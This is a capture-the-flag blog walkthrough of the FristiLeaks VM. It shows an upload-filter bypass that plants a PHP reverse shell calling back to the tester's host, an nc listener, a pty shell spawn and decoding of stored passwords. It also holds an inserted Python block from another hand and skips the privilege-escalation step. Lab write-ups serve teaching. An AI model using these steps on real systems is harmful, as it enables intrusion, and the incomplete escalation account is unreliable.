Fristileaks Walkthrough

Vsunaniya
7 min read · Feb 10, 2020

This is my first blog and my first machine “Fristileaks”

INTRODUCTION FristiLeaks

NAME: Fristileaks 1.3
AUTHOR: Ar0xA
SERIES: Fristileaks
STYLE: Enumeration/Follow the breadcrumbs
GOAL: get root (uid 0) and read the flag file
Tester(s): dqi, barrebas
Difficulty: Basic

Description:

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc. VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

Virtual Machine:

Format: Virtual Machine (Virtualbox — OVA)
Operating System: Linux

!!Identify the IP address of FristiLeaks machine by using nmap command!!

# nmap -sn 192.168.56.1/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020–01–30 19:30 IST
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:62:3C:42 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00046s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.78 seconds

!!After finding the machine's IP you should ping it, just to check whether it is live or not.!!

# ping 192.168.56.105

PING 192.168.56.105 (192.168.56.105) 56(84) bytes of data.
64 bytes from 192.168.56.105: icmp_seq=1 ttl=64 time=0.426 ms
64 bytes from 192.168.56.105: icmp_seq=2 ttl=64 time=0.441 ms

!!Now Identify services running on FristiLeaks machine by using nmap!!

# nmap -v -A -sT -O -p- 192.168.56.105

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32–3.10, Linux 2.6.32–3.13
Uptime guess: 0.039 days (since Thu Jan 30 19:22:15 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 164.66 ms 192.168.56.105

!!Now let's see what we find on the HTTP port 80: http://192.168.56.105!!

On port 80 I found a page with an introduction about Fristi.

!!Then let's check what we find in robots.txt!!

On this page we find three names, cola, sisi and beer, which lead to nothing useful. !!NOTE: Always check robots.txt, because it often gives crucial information!!
This is the image we get when we visit the paths listed in robots.txt.

!!As the name of the machine is FristiLeaks, we go ahead and access /fristi: http://192.168.56.105/fristi!!

!!Now we get two fields, username and password, on this page. For more information let's check the page source; press Ctrl+U for that.!!

After pressing Ctrl+U we get the source code, which contains an HTML comment holding a long base64 string:

<!-- (long base64-encoded PNG image omitted) -->

!!In the page’ source code there was also a comment with a possible username:!!

<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

-by eezeepz
-->

!!The base64 string from the source code has to be decoded to an image (https://www.base64decode.net/base64-image-decoder)!!

We have username = eezeepz
and in the decoded image we find password =
keKkeKKeKKeKkEkkEk

!!Then we have to upload a PHP REVERSE SHELL FILE and add extension .jpg for upload field!!

# cp php-reverse-shell.php php-reverse-shell.php.jpg

# vim php-reverse-shell.php.jpg

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
:wq!

Login successful!!

!!THEN UPLOAD THIS FILE ON http://192.168.56.105/fristi/upload.php!!

Then launch
# nc -lnvp 1234

Then go to browser
http://192.168.56.105/fristi/uploads/php-reverse-shell.php.jpg

After this we got shell

# nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.105] 40982
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
12:26:48 up 4:04, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ cd home
$cd home

!!Here we find three user names: admin, eezeepz and fristigod!!
sh-4.1$ ls
ls
admin
eezeepz
fristigod


sh-4.1$ cd admin
cd admin

sh-4.1$ ls -alh
ls -alh
total 652K
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 89K Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt

!!In the admin folder there are two .txt files. Opening them (with the cat command) gives us two encrypted passwords.!!

sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

!!After getting these encrypted passwords, look at the .py file next to them: it shows the scheme, so on your own terminal create a Python file named cryptpass.py that reverses it.!!

root@winvista:~# cat cryptpass.py
import base64, codecs, sys

def encodeString(crypted):
    # undo the VM's scheme: reverse the string, apply rot13, then base64-decode
    decoded = codecs.decode(crypted[::-1], 'rot13')
    return base64.b64decode(decoded)

cryptoResult = encodeString(sys.argv[1])
print(cryptoResult.decode())  # works on both Python 2 and Python 3

!!After that, run this Python file on each encrypted password from the .txt files to decode it!!

root@winvista:~# python cryptpass.py mVGZ3O3omkJLmy2pcuTq (#command#)
thisisalsopw123(#decoded password#)

root@winvista:~# python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG (#command#)
LetThereBeFristi!(#decoded password#)
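As an added example (not code from the original post or the VM), here are both directions of the cryptpass.py scheme: the decoder from above plus its inverse, the encoder. The point for a defender is that every step (base64, rot13, string reversal) is keyless and reversible, so this is obfuscation, not encryption; it also shows that rot13 and reversal commute, so either order yields the same string.

```python
import base64
import codecs


def fristi_encode(plaintext: str) -> str:
    """base64-encode, apply rot13, then reverse the string.

    rot13 only touches letters, so it is well defined on base64 text
    (digits, '+', '/' and '=' pass through unchanged).
    """
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64, "rot13")[::-1]


def fristi_decode(ciphertext: str) -> str:
    """Undo the three steps in reverse order: reverse, rot13, base64-decode."""
    b64 = codecs.decode(ciphertext[::-1], "rot13")
    return base64.b64decode(b64).decode()


def roundtrip_ok(plaintext: str) -> bool:
    """True when encode followed by decode gives the input back (no key needed)."""
    return fristi_decode(fristi_encode(plaintext)) == plaintext


def order_independent(plaintext: str) -> bool:
    """True when reversing before rot13 gives the same result as rot13 before reversing."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    reverse_then_rot = codecs.encode(b64[::-1], "rot13")
    rot_then_reverse = codecs.encode(b64, "rot13")[::-1]
    return reverse_then_rot == rot_then_reverse


# The two values found in the VM's .txt files (copied from the walkthrough above).
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"

if __name__ == "__main__":
    for value in (CRYPTEDPASS, WHOISYOURGODNOW):
        print(value, "->", fristi_decode(value))
    print("round-trip works without a key:", roundtrip_ok("any text at all"))
    print("rot13 and reversal commute:", order_independent("any text at all"))
```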

!!From the admin folder we get two passwords: one is for fristigod and the other is for admin!!

!!Now let's go and check what we get from the other user!!

sh-4.1$ cd eezeepz
cd eezeepz

!!There was a file called notes.txt that had some information in it!!

sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don’t forget to specify the full path for each binary!

Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.

- Jerry

!!Now I launched a bash shell with a Python one-liner. I tried to log in as admin, but that user could not run the sudo command! Instead the fristigod user was able to run the sudo command!!

!!I needed a TTY which I get with Python:!!

sh-4.1$ python -c "import pty; pty.spawn('/bin/bash')"
python -c "import pty; pty.spawn('/bin/bash')"

sh-4.1$ su - fristigod
su - fristigod
Password:
LetThereBeFristi!

-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod:
LetThereBeFristi!

Enumeration as the user fristigod revealed the SUID binary: /var/fristigod/.secret_admin_stuff/doCom.

-bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff

-bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 ..
-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom
-bash-4.1$

Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

ROOT FLAGS

bash-4.1$ cd /root
cd /root
-bash-4.1$ ls -lh
ls -lh
total 4.0K
-rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt

-bash-4.1$ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it’s supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Learn and enjoy, have fun!!
